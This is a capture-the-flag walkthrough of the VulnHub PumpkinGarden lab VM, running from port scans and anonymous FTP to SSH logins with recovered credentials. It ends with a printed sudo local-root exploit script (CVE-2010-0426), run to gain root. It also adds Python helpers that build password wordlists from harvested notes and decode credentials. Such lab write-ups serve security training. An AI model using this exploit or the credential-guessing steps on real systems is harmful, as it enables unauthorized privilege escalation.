Mission Pumpkin V1 PumpkinGarden

Incomplete notes

Mission-Pumpkin v1.0 is a beginner-level CTF series, created with beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but are struggling to apply the tools they know. I believe that the machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of a series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to the PumpkinGarden_key file stored in the root account.

1) I download the machine from https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/

2) I import the machine into VirtualBox.

Note: if the machine will not import cleanly, rename the .ova to .ova.tar and extract the hard disk csec-disk001.vmdk.
Create a new virtual machine of type Linux Ubuntu (64-bit) and attach the extracted disk to it.

3) I boot the machine to be audited in VirtualBox

Note 2: I configure its network as a host-only adapter.

My VMs' network is 192.168.56.XX (this may differ on your machine; check with ip a | grep global).
Then I run nmap -sn 192.168.56.0/24 or nmap -sn 192.168.56.* to see what comes up:



Enumeration

The machine's IP is 192.168.56.103. I enumerate ports:
em50l@jejo.es$ nmap -F -Pn 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:08 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00037s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
21/tcp open  ftp

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

Only FTP??? I pull more details…

em50l@jejo.es$ nmap  192.168.56.103 -sC -p 21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:15 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00048s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

It is an anonymous FTP server, so I can browse it easily.




This time I will use curl instead of mc.

em50l@jejo.es$ curl ftp://192.168.56.103/
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
em50l@jejo.es$ curl ftp://192.168.56.103/note.txt
Hello Dear! 
Looking for route map to PumpkinGarden? I think jack can help you find it.
em50l@jejo.es$ 

If I want to see the FTP exchange in detail I can use the -v option.

em50l@jejo.es$ curl -v ftp://192.168.56.103/
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
< 220 Welcome to Pumpkin's FTP service.
> USER anonymous
< 331 Please specify the password.
> PASS ftp@example.com
< 230 Login successful.
> PWD
< 257 "/"
* Entry path is '/'
> EPSV
* Connect data stream passively
< 229 Entering Extended Passive Mode (|||40149|).
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connecting to 192.168.56.103 (192.168.56.103) port 40149
* ftp_perform ends with SECONDARY: 0
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
* Maxdownload = -1
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
* Remembering we are in dir ""
< 226 Directory send OK.
* Connection #0 to host 192.168.56.103 left intact

From the above, one user appears to be jack.
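The -v trace is worth reading as a protocol transcript rather than noise: every client command and server reply code is there, including the password sent in the clear and the data port the server opens in reply to EPSV. The following Python is an added example, not part of the original notes, that parses such a curl -v control-channel trace into command/reply pairs and pulls out the security-relevant facts. TRACE is a constructed sample copied from the session above; the function names and the keys returned by summarize() are my own.

```python
import re

# Constructed sample input: the curl -v control-channel lines from the anonymous
# login above, with curl's prefixes ('>' sent by client, '<' received from server).
TRACE = """\
< 220 Welcome to Pumpkin's FTP service.
> USER anonymous
< 331 Please specify the password.
> PASS ftp@example.com
< 230 Login successful.
> PWD
< 257 "/"
> EPSV
< 229 Entering Extended Passive Mode (|||40149|).
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
< 226 Directory send OK.
"""

# RFC 2428 EPSV reply: "(|||<port>|)"
EPSV_RE = re.compile(r"\(\|\|\|(\d+)\|\)")


def parse_trace(trace):
    """Pair each client command with the server replies that follow it.

    Returns a list of {'cmd': 'USER anonymous', 'replies': [(331, 'Please ...')]}.
    Replies seen before the first command (the banner) are attached to cmd None.
    """
    exchanges = [{"cmd": None, "replies": []}]
    for line in trace.splitlines():
        if line.startswith("> "):
            exchanges.append({"cmd": line[2:].strip(), "replies": []})
        elif line.startswith("< "):
            m = re.match(r"(\d{3})[ -](.*)", line[2:])
            if m:
                exchanges[-1]["replies"].append((int(m.group(1)), m.group(2).strip()))
    return exchanges


def summarize(trace):
    """Facts a reviewer wants: anonymous login, cleartext password, passive data port."""
    facts = {"anonymous": False, "login_ok": False,
             "cleartext_password": None, "passive_port": None}
    for e in parse_trace(trace):
        verb, _, arg = (e["cmd"] or "").partition(" ")
        codes = [code for code, _ in e["replies"]]
        if verb == "USER" and arg.lower() in ("anonymous", "ftp"):
            facts["anonymous"] = True
        if verb == "PASS":
            # The control connection is plain text, so this is what a sniffer sees.
            facts["cleartext_password"] = arg
            facts["login_ok"] = 230 in codes
        if verb == "EPSV":
            for _, text in e["replies"]:
                m = EPSV_RE.search(text)
                if m:
                    facts["passive_port"] = int(m.group(1))
    return facts


if __name__ == "__main__":
    for cmd_reply in parse_trace(TRACE):
        print(cmd_reply)
    print(summarize(TRACE))
```

The same parser works on the "> "/"< " lines of any curl -v FTP session, so it can be pointed at a saved trace to confirm that a login was anonymous and that the password crossed the wire unencrypted.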




  • Dictionary attack. (Doesn't seem to work)
  • I try mc ftp://jack:PumpkinGarden@192.168.56.103/ (lucky guess???). I think a dictionary has to be built from the files pulled from the FTP.
Midnight Commander 4.8.19, left panel on ftp://jack@192.168.56.103/ (login accepted), showing the remote root filesystem:
  /..  /bin  /boot  /dev  /etc  /home  /lib  /lib64  /lost+found  /media  /mnt  /opt  /proc  ...
Info panel for the selected entry /home: drwxr-xr-x (0755), owner root/root, 4096 bytes (8 blocks), changed/modified/accessed 11 Jun 18:25; filesystem shown as /home on /dev/sda2, ext4, 148G/190G free (77%).

I see the following users in home: goblin, jack and scarecrow, and inside jack's folder there is a note:

Are you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...
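The notes pulled so far contain exactly the kind of strings a target-specific wordlist is built from: the CTF name, the three account names, and "pumpkin garden" written two ways. As an added example, not from the original notes, the Python below builds such a list from the two notes and the home-directory names. The mutation rules (case variants, a handful of leet substitutions, a few suffixes, joining adjacent words) and the minimum word length are my own assumptions; NOTES and USERS are constructed from the text recovered above.

```python
import re
from itertools import product

# Constructed sample input: the two notes recovered from the FTP server on this
# box (note.txt from the anonymous share and the note in jack's home).
NOTES = [
    "Hello Dear!\nLooking for route map to PumpkinGarden? I think jack can help you find it.",
    "Are you here for keys to pumpkin garden?\n"
    "I'm afraid that scarecrow has just stolen the keys from me...",
]

# Account names seen under /home; the names themselves are password candidates.
USERS = ["goblin", "jack", "scarecrow"]

# Assumed mutation rules (mine, not from the page).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ["", "1", "123", "2019", "!"]


def tokens(text, min_len=4):
    """Alphanumeric words of at least min_len chars, keeping CamelCase intact."""
    return [w for w in re.findall(r"[A-Za-z][A-Za-z0-9]*", text) if len(w) >= min_len]


def variants(word):
    """Case, leet and suffix mutations of one base word."""
    cases = {word, word.lower(), word.upper(), word.capitalize()}
    bases = cases | {c.translate(LEET) for c in cases}
    return {base + suffix for base, suffix in product(bases, SUFFIXES)}


def build_wordlist(texts, users):
    """Candidate passwords from free text plus known usernames, sorted and unique."""
    words = set()
    for text in texts:
        toks = tokens(text)
        for w in toks:
            words |= variants(w)
        # Join neighbouring words so "pumpkin garden" yields pumpkingarden / PumpkinGarden.
        for a, b in zip(toks, toks[1:]):
            words |= variants(a + b)
            words |= variants(a.capitalize() + b.capitalize())
    for u in users:
        words |= variants(u)
    return sorted(words)


if __name__ == "__main__":
    wordlist = build_wordlist(NOTES, USERS)
    print(len(wordlist), "candidates")
    for w in wordlist:
        print(w)
```

Writing the output to a file gives a list small enough to try by hand against FTP and, once the port is found, SSH; the point is that the password the author guessed above is produced mechanically from the notes.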








Days later ;)
I think more ports need to be scanned.

em50l@jejo.es:~$ nmap -p1-65534 -n -A 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-08-01 02:06 CEST
Nmap scan report for 192.168.56.103
Host is up (0.0083s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (EdDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.65 seconds

I see an Apache on port 1515
and an SSH server on port 3535





I try SSH with the FTP user and password (password reuse)

em50l@jejo.es$ sshpass -p 'PumpkinGarden' ssh jack@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Sun Aug 25 18:20:43 2019 from 192.168.56.1

jack@Pumpkin:~$ #  !!!User-level access obtained!!! We continue in the privilege escalation section

Now I need a privilege escalation.

I browse the file tree over SSH to see what I can find.

em50l@jejo.es$ mc sh://jack@192.168.56.101:3535 
No protocol specified

fish: Waiting for initial line...
jack@192.168.56.101's password: 





HTTP enumeration

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_scanner) > set rport 1515
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.101
[+] Found http://192.168.56.101:1515/icons/ 403 (192.168.56.101)
[+] Found http://192.168.56.101:1515/img/ 200 (192.168.56.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Good, I have found icons and img

I try another way

msf5 > use auxiliary/scanner/http/brute_dirs
msf5 auxiliary(scanner/http/brute_dirs) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/brute_dirs) > set rport 1515
msf5 auxiliary(scanner/http/brute_dirs) > run

[*] Using code '404' as not found.
[+] Found http://192.168.56.101:1515/img/ 200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

dir_listing returns nothing

msf5 > use auxiliary/scanner/http/dir_listing 
msf5 auxiliary(scanner/http/dir_listing) > set rport 1515
msf5 auxiliary(scanner/http/dir_listing) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_listing) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 > use auxiliary/scanner/http/files_dir
msf5 auxiliary(scanner/http/files_dir) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/files_dir) > set rport 1515
msf5 auxiliary(scanner/http/files_dir) > run

[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.168.56.101:1515/index.html 200
...
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.56.101:1515/img 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Poking around I find:

em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt
c2NhcmVjcm93IDogNVFuQCR5

base64???

em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt |base64 --decode
scarecrow : 5Qn@$y

It looks like a username and password.
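The clue decodes to a "user : password" pair, and the root key found at the end of the box is base64 as well. This added Python example, not part of the original notes, checks whether a string is plausibly base64, tolerates stripped "=" padding, decodes only to printable text, and splits decoded credentials. SAMPLES is a constructed list of the three strings found on this box; the last one is a plain password from scarecrow's note and must not decode. Function names are mine.

```python
import base64
import binascii
import re
import string

# Standard base64 alphabet with optional trailing padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def try_base64(s):
    """Return the decoded text if s is base64 for printable text, else None.

    Missing '=' padding (common when a clue is hand-trimmed) is restored before
    decoding; anything that is not valid UTF-8 printable text is rejected so
    that ordinary words such as usernames do not "decode" into garbage.
    """
    s = s.strip()
    if not s or not B64_RE.match(s):
        return None
    padded = s + "=" * (-len(s) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not all(c in PRINTABLE for c in text):
        return None
    return text


def parse_credential(text):
    """Split 'user : pass' or 'user:pass' into a (user, password) tuple, or None."""
    m = re.match(r"^\s*([A-Za-z0-9_.-]+)\s*:\s*(\S+)\s*$", text)
    return (m.group(1), m.group(2)) if m else None


def harvest(candidates):
    """Decode every candidate; map each decodable input to its text and any credential."""
    found = {}
    for c in candidates:
        text = try_base64(c)
        if text is not None:
            found[c] = {"text": text, "credential": parse_credential(text)}
    return found


# Constructed sample input: clue.txt from the web server, the key in root's home,
# and the password string from scarecrow's note (not base64).
SAMPLES = ["c2NhcmVjcm93IDogNVFuQCR5", "Q29uZ3JhdHVsYXRpb25zIQ==", "Y0n$M4sy3D1t"]

if __name__ == "__main__":
    for encoded, info in harvest(SAMPLES).items():
        print(encoded, "->", info)
```

The printable-text check matters in practice: short tokens like "jack" or "goblin" pass the alphabet test, decode to a few bytes, and are rejected only because those bytes are not valid UTF-8 text.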

em50l@jejo.es$ sshpass -p '5Qn@$y' ssh scarecrow@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ #  !!!User-level access obtained!!! We continue in the privilege escalation section
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt 

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! 
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.


em50l@jejo.es$ sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ ls
note  
goblin@Pumpkin:~$ cat note 

Hello Friend! I heard that you are looking for PumpkinGarden key. 
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.

Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

goblin@Pumpkin:~$ 


The exploit code they point to is this. It targets CVE-2010-0426 in the sudo versions named in its header (1.6.x before 1.6.9p21, 1.7.x before 1.7.2p4): when sudoers grants the sudoedit pseudo-command, those versions match it against any executable named sudoedit in the current directory and run it as root, so the script drops a fake sudoedit that spawns su and invokes it through sudo:

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
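Before running a version-specific exploit it pays to check the target's sudo against the ranges in the exploit header. This Python is an added example, not the page's or kingcope's code: it parses `sudo -V` output and compares the version, patchlevel included, against the fixed releases named in the header (1.6.9p21 and 1.7.2p4). The FIXED table and function names are mine. One caveat for this box: the banners (Apache 2.4.7, OpenSSH 6.6.1p1 2ubuntu2.13) are Ubuntu 14.04-era, whose sudo is newer than the affected range, so a fake sudoedit only gains root here through whatever sudoers grants goblin; `sudo -l` as goblin shows that.

```python
import re
import subprocess

# First fixed release per affected branch, from the exploit header
# (1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 are vulnerable; CVE-2010-0426).
FIXED = {(1, 6): (1, 6, 9, 21), (1, 7): (1, 7, 2, 4)}


def parse_sudo_version(text):
    """'Sudo version 1.8.9p5' or '1.7.2p3' -> (1, 7, 2, 3); a missing patchlevel is 0."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version found in: %r" % text)
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def is_vulnerable(version):
    """True when the version is in an affected branch and older than its fix.

    Accepts either a version string / `sudo -V` output or an already parsed tuple.
    Tuple comparison orders 1.6.9 (patchlevel 0) below 1.6.9p21 as required.
    """
    v = parse_sudo_version(version) if isinstance(version, str) else tuple(version)
    fixed = FIXED.get(v[:2])
    return fixed is not None and v < fixed


def check_local_sudo():
    """Run `sudo -V` (printing the version needs no privileges) and evaluate it."""
    out = subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=False).stdout
    return parse_sudo_version(out), is_vulnerable(out)


if __name__ == "__main__":
    version, vulnerable = check_local_sudo()
    print("sudo %d.%d.%dp%d" % version, "VULNERABLE" if vulnerable else "not in affected range")
```

If the version is outside the affected range and `sudo ./sudoedit` still works, the escalation is a sudoers misconfiguration rather than the 2010 bug, which changes what you report.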

goblin@Pumpkin:~$ cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
goblin@Pumpkin:~$ chmod a+x ./sudoedit
goblin@Pumpkin:~$ sudo ./sudoedit $1
[sudo] password for goblin: 
Sorry, try again.
[sudo] password for goblin: 
ALEX-ALEX
root@Pumpkin:/home/goblin# cd
root@Pumpkin:~# cat PumpkinGarden_Key 
Q29uZ3JhdHVsYXRpb25zIQ==

To investigate: wmap

https://jonathansblog.co.uk/metasploit-for-website-pentest